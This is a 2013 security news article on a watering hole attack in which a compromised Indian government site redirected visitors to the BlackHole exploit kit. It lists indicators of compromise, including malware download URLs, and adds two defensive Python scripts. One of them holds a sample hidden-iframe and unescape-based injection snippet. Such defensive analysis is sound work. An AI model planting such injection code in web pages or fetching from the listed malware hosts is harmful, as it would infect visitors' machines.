Watering hole attacks and exploit kits – Indian gov site case

Pierluigi Paganini May 27, 2013

The number of watering hole attacks is increasing, and most of them rely on well-known exploit kits. A compromised Indian government website that redirected visitors to the BlackHole exploit kit is a recent case in point.

Watering hole attacks have increased significantly in recent years, following a worrying trend. The technique relies on infecting a website's visitors: attackers typically compromise a legitimate website and plant a "drive-by" exploit on it.

The watering hole technique has been observed since 2009, when civil society organizations were attacked with this method and their websites were used as a channel to deliver zero-day exploits to specific targets.

The technique is ideal for compromising selected targets, individuals or small communities, who look for the specific content offered by the website used to deliver the malicious code.

The efficiency of watering hole attacks increases when attackers use zero-day exploits against the victim's software: in that case there is no patch to apply, and the victim has no practical way to protect the system from infection.

Once a victim visits the page on the compromised website, a backdoor trojan is installed on their computer. The watering hole method is very common in cyber espionage operations and state-sponsored attacks. Governments are the primary buyers of zero-day exploits, which are used to compromise victims' machines while remaining undetected for long periods; the ability to stay silent over time is decisive for the success of the attack.

A recent post published by Dancho Danchev revealed that a compromised Indian government website leads to the BlackHole exploit kit: researchers at Webroot detected the infection on the website of the Ministry of Micro, Small and Medium Enterprises (MSME DI Jaipur).

The researchers tried to profile the campaign and found that the URL serving the BlackHole exploit kit had already been used in earlier client-side exploit serving campaigns: in 2012 the same IP was also seen in a malvertising campaign.

[Image: Watering Hole Indian Government Website]

In the post the researchers provided the list of malicious domain names used in the attack and a sample of compromised URLs; the details of the investigation follow.

Sample compromised URLs:
 hxxp://sisijaipur.gov.in/cluster_developement.html
 hxxp://msmedijaipur.gov.in/cluster_developement.html

Malicious domain names/redirectors reconnaissance:
 888-move-stuff.com – 50.63.202.21 – Email: van2move@yahoo.com
 888movestuff.com – 208.109.181.190 – Email: van2move@yahoo.com
 jobbelts.com (redirector/C&C) – 98.124.198.1 – Email: aanelli@yahoo.com

More malicious domains are known to have been responding to the same IP (98.124.198.1) in the past:
 adventure-holiday-specials.com
 appraisingla.com
 arc-res.com
 a-to-z-of-barbados.com
 bookmarkingdemonx.com
 ceointerns.com
 charityairsupport.org
 csepros.com
 dominateseowithwordpress.com
 enum365.com
 jobbelts.com
 karenbrowntx.com
 rankbuilder2.net
 seopressors.org
 stopchasingmoney.com
 thefamily4life.org
 ventergy.com

To get an idea of the effectiveness of the malicious script used by the attackers, detected as Trojan:JS/BlacoleRef.W and Trojan-Downloader.JS.Iframe.czf (MD5 44a8c0b8d281f17b7218a0fe09840ce9), it is useful to look at its detection rate: 24 out of 27 antivirus engines flagged it. Although the BlackHole redirecting URL planted on the Indian government website is currently not accepting connections, the security experts at Webroot noted that it was active on 2012-07-03 08:04:36, delivering malicious content.

The sample redirection chain discovered by the researchers is:

[Image: Watering Hole Indian Web site Exploit chain]

Once the client application on the victim's machine has been exploited, Trojan-Ransom.Win32.Birele.vjr (aka PWS:Win32/Fareit.gen!C) is dropped, and additional malware is downloaded from:

hxxp://euxtoncorinthiansfc.co.uk/pd.exe
hxxp://euxtoncorinthiansfc.co.uk/1689.exe
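To turn the indicators above into a check a defender can actually run, here is an added example (not code from the original post or from Webroot's analysis). It refangs the hxxp:// indicators, classifies the URLs in a web proxy log against the compromised pages, the redirector domains and IPs, and the second-stage download host listed above, and singles out clients that loaded one of the compromised government pages and then reached the attackers' infrastructure. The proxy log format (epoch, client, method, URL, status) and the log lines themselves are constructed for the demo, and the paths under jobbelts.com and 98.124.198.1 are made up.

```python
"""IOC sweep for the BlackHole redirector campaign described above.

Added example for this post (not Webroot's or the author's code). The
indicator values come from the list above; the proxy log format and the
log lines below are constructed for the demo, and the paths under
jobbelts.com and 98.124.198.1 are made up.
"""
import re
from urllib.parse import urlparse

# Indicators from the post, kept defanged (hxxp) exactly as published.
COMPROMISED_URLS = [
    "hxxp://sisijaipur.gov.in/cluster_developement.html",
    "hxxp://msmedijaipur.gov.in/cluster_developement.html",
]
MALICIOUS_DOMAINS = {
    "888-move-stuff.com", "888movestuff.com", "jobbelts.com",
    "adventure-holiday-specials.com", "appraisingla.com", "arc-res.com",
    "a-to-z-of-barbados.com", "bookmarkingdemonx.com", "ceointerns.com",
    "charityairsupport.org", "csepros.com", "dominateseowithwordpress.com",
    "enum365.com", "karenbrowntx.com", "rankbuilder2.net", "seopressors.org",
    "stopchasingmoney.com", "thefamily4life.org", "ventergy.com",
    "euxtoncorinthiansfc.co.uk",  # second-stage payload host (pd.exe, 1689.exe)
}
MALICIOUS_IPS = {"50.63.202.21", "208.109.181.190", "98.124.198.1"}
KNOWN_MD5 = {"44a8c0b8d281f17b7218a0fe09840ce9"}  # Trojan:JS/BlacoleRef.W


def refang(indicator: str) -> str:
    """Turn a defanged hxxp:// indicator back into a real URL."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", indicator, flags=re.I)


def host_of(url: str) -> str:
    return (urlparse(refang(url)).hostname or "").lower()


COMPROMISED_HOSTS = {host_of(u) for u in COMPROMISED_URLS}


def classify(url: str):
    """Label a URL: 'compromised-site', 'malicious-ip', 'malicious-domain' or None."""
    host = host_of(url)
    if host in COMPROMISED_HOSTS:
        return "compromised-site"
    if host in MALICIOUS_IPS:
        return "malicious-ip"
    if any(host == d or host.endswith("." + d) for d in MALICIOUS_DOMAINS):
        return "malicious-domain"
    return None


def known_sample(md5_hex: str) -> bool:
    """True if a file hash matches the redirector script's published MD5."""
    return md5_hex.lower() in KNOWN_MD5


# Constructed proxy log (assumed format: epoch client method url status).
# The first epoch equals 2012-07-03 08:04:36 UTC, the time Webroot saw the
# redirector active; everything else on these lines is made up.
SAMPLE_LOG = """\
1341302676.123 10.0.0.5 GET http://msmedijaipur.gov.in/cluster_developement.html 200
1341302677.456 10.0.0.5 GET http://jobbelts.com/in.php 200
1341302679.001 10.0.0.5 GET http://euxtoncorinthiansfc.co.uk/pd.exe 200
1341302680.500 10.0.0.9 GET http://www.example.org/index.html 200
1341302681.000 10.0.0.9 GET http://98.124.198.1/x.php 200
"""


def scan_log(text: str):
    """Return (client, label, url) for every log line that touches an IOC."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line: skip rather than abort the sweep
        _ts, client, _method, url, _status = fields[:5]
        label = classify(url)
        if label:
            hits.append((client, label, url))
    return hits


def suspected_victims(hits):
    """Clients that loaded a compromised page and afterwards reached attacker infra.

    A hit on the redirector IP without the prior watering-hole visit is still
    worth a look (it may be a scanner or an unrelated redirect), so it stays in
    `hits` but is not promoted to a suspected victim.
    """
    primed, victims = set(), []
    for client, label, _url in hits:
        if label == "compromised-site":
            primed.add(client)
        elif client in primed and client not in victims:
            victims.append(client)
    return victims


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print("%-10s %-17s %s" % hit)
    print("suspected victims:", suspected_victims(hits))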

Attacks like this one are becoming very popular. In early 2013 Solutionary's Security Engineering Research Team (SERT) published an interesting study that revealed the rise of exploit kits, most of them originating in Russia.

BlackHole 2.0 is considered the most popular and pervasive exploit kit, despite exploiting fewer vulnerabilities than other kits do. Over 18% of the malware instances detected were directly attributed to BlackHole, a web application that exploits known vulnerabilities in popular browsers and browser-facing software such as Adobe Reader, Adobe Flash and Java.

[Image: Exploit kits]
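The part of the kit that lives on the compromised site is the injected redirector the antivirus names above point at (Trojan:JS/BlacoleRef.W, Trojan-Downloader.JS.Iframe.czf): a hidden iframe or an obfuscated inline script that pulls the kit's landing page from an attacker-controlled host, which then serves the Reader, Flash or Java exploits. The scanner below is an added example, not code from the post or from Webroot, that walks a page's HTML and flags off-site iframes that are hidden or one pixel in size and inline scripts assembled with eval, unescape or String.fromCharCode. The sample page is constructed and only borrows the jobbelts.com redirector domain from the indicator list; the exact code injected into the Indian site is not reproduced on the page.

```python
"""Spot a BlackHole-style injection in a page's HTML.

Added example for this post (not Webroot's or the author's code). The
checks are generic: hidden or 1x1 off-site iframes and inline scripts
built with eval/unescape/String.fromCharCode. The sample page below is
constructed and only borrows the jobbelts.com domain from the IOC list.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles commonly used to keep an injected iframe out of sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
# Builders typical of obfuscated redirector scripts.
OBFUSCATION = re.compile(r"\b(?:eval|unescape|String\.fromCharCode)\s*\(", re.I)


def _px(value):
    """Leading integer of a width/height attribute ('1', '1px'); None if absent."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class InjectionScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []       # (kind, detail) pairs
        self._script = None      # buffer for the inline script being read

    def _offsite(self, src):
        """True if src points to a host other than the site or its subdomains."""
        host = (urlparse(src).hostname or "").lower()
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe" and self._offsite(a.get("src", "")):
            w, h = _px(a.get("width")), _px(a.get("height"))
            tiny = w is not None and h is not None and w <= 1 and h <= 1
            if tiny or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", a["src"]))
        elif tag == "script":
            if self._offsite(a.get("src", "")):
                self.findings.append(("offsite-script", a["src"]))
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            if OBFUSCATION.search(body):
                self.findings.append(("obfuscated-script", body.strip()[:60]))
            self._script = None


def scan_page(html, site_host):
    """Return the list of (kind, detail) injections found in `html`."""
    s = InjectionScanner(site_host)
    s.feed(html)
    s.close()
    return s.findings


# Constructed page standing in for the compromised government site.
SAMPLE_PAGE = """<html><head><title>Cluster Development</title>
<script src="/js/menu.js"></script></head>
<body><h1>Cluster Development Programme</h1>
<p>Legitimate page content.</p>
<iframe src="http://jobbelts.com/" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http://jobbelts.com/%22%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, "msmedijaipur.gov.in"):
        print(kind, detail)
```

Run against a copy of each page taken from the web server itself rather than through a browser, because an exploit kit's redirector often serves clean content to repeat visitors or to clients that do not look like the targeted browsers. Subdomains of the site are treated as on-site, so an attacker-registered lookalike must differ in the registered domain to be caught.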

A watering hole attack is much more efficient than a spear phishing attack, in which the success of the operation depends on the recipient clicking a link or opening an attachment. There is a high probability that the victim discards the malicious email, even when the malware can elude antivirus detection thanks to a zero-day exploit. A watering hole attack overcomes this difficulty by compromising and infecting a website the victim is likely to visit.

What to expect from the future?

Security experts have no doubt: the number of watering hole attacks is destined to grow in the coming months because of the wide availability of exploit kits on the black market, even though compromising a target website is more difficult than other methods of attack.

Pierluigi Paganini

(Security Affairs – Watering Hole attack)

0-day cyber espionage Dancho Danchev exploit kit Black Hole malware spear phishing targeted attacks watering hole Webroot